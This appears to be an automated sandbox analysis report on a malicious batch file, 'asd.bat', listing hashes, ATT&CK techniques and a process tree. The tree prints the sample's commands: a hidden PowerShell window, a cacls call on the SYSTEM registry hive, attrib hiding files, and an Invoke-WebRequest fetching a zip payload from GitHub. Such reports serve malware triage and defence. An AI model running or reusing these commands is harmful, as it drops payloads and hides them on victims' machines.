42b176fc5efa8e8d1a7a21afc72dbb23a81baaa2a0938a2c5d267459139abe48

Analysis

max time kernel
1562s
max time network
1567s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
23-10-2024 17:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

asd.bat
Size

1KB
MD5

0dababeef5a7a86809d847382772d821
SHA1

612be301ee1bc7a422f79b2d17822ee2244efc4c
SHA256

56af74c6f17f1e987ace45d8ec180ed38d221f2fdfe9d601bdec2d703689bdb4
SHA512

1ec9342d34914503dc475fd5fb300cbbb2ace1e9b6e8cc1b9221dd3468eb64a1e0d7f3d0c6f8427207239c61c4b8fb87da89f88f6920b95ef928dd1214d17d6a

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
2016	powershell.exe
2724	powershell.exe

Deletes itself 1 IoCs

Processes:

cmd.exe

pid	Process
2296	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid	Process
2016	powershell.exe
2724	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	2016	powershell.exe
Token: SeDebugPrivilege	2724	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

cmd.exe

description	pid	Process	procid_target
PID 2296 wrote to memory of 2016	2296	cmd.exe	32
PID 2296 wrote to memory of 2016	2296	cmd.exe	32
PID 2296 wrote to memory of 2016	2296	cmd.exe	32
PID 2296 wrote to memory of 2368	2296	cmd.exe	33
PID 2296 wrote to memory of 2368	2296	cmd.exe	33
PID 2296 wrote to memory of 2368	2296	cmd.exe	33
PID 2296 wrote to memory of 2704	2296	cmd.exe	34
PID 2296 wrote to memory of 2704	2296	cmd.exe	34
PID 2296 wrote to memory of 2704	2296	cmd.exe	34
PID 2296 wrote to memory of 2724	2296	cmd.exe	35
PID 2296 wrote to memory of 2724	2296	cmd.exe	35
PID 2296 wrote to memory of 2724	2296	cmd.exe	35

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exe

pid	Process
2704	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\asd.bat"
1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -window hidden -command ""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2016
- C:\Windows\system32\cacls.exe
  "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
  2⤵
  PID:2368
- C:\Windows\system32\attrib.exe
  attrib +h "Anon" /s /d
  2⤵
  - Views/modifies file attributes
  PID:2704
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "Invoke-Webrequest 'https://github.com/bonsko216/1/raw/refs/heads/main/1.zip' -OutFile 1.zip"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CJKS7Q3M8A64M2K7Q4NJ.temp

Filesize
7KB

MD5
033fcc0b5033f7808cbed0688f29f42d

SHA1
1b218e47109eeff68eb729f56e06ed55483015ca

SHA256
f841df001eb98816ddae2df220554a9c20f3639867f76b33ac823451baaa2cbc

SHA512
7477a65c860eb592a9a939f32207e6689eb3d258b4372f402fd88506d5bebf06633b383c9d3f888d958fb0cb2138e643b97a286ff5d624c50c02d22f3c9d1044

Download Submit
memory/2016-4-0x000007FEF5B3E000-0x000007FEF5B3F000-memory.dmp

Filesize
4KB

Download
memory/2016-5-0x000000001B2B0000-0x000000001B592000-memory.dmp

Filesize
2.9MB

Download
memory/2016-6-0x00000000024E0000-0x00000000024E8000-memory.dmp

Filesize
32KB

Download
memory/2016-8-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

Filesize
9.6MB

Download
memory/2016-7-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

Filesize
9.6MB

Download
memory/2016-9-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

Filesize
9.6MB

Download
memory/2016-10-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

Filesize
9.6MB

Download
memory/2724-16-0x000000001B2D0000-0x000000001B5B2000-memory.dmp

Filesize
2.9MB

Download
memory/2724-17-0x0000000002420000-0x0000000002428000-memory.dmp

Filesize
32KB

Download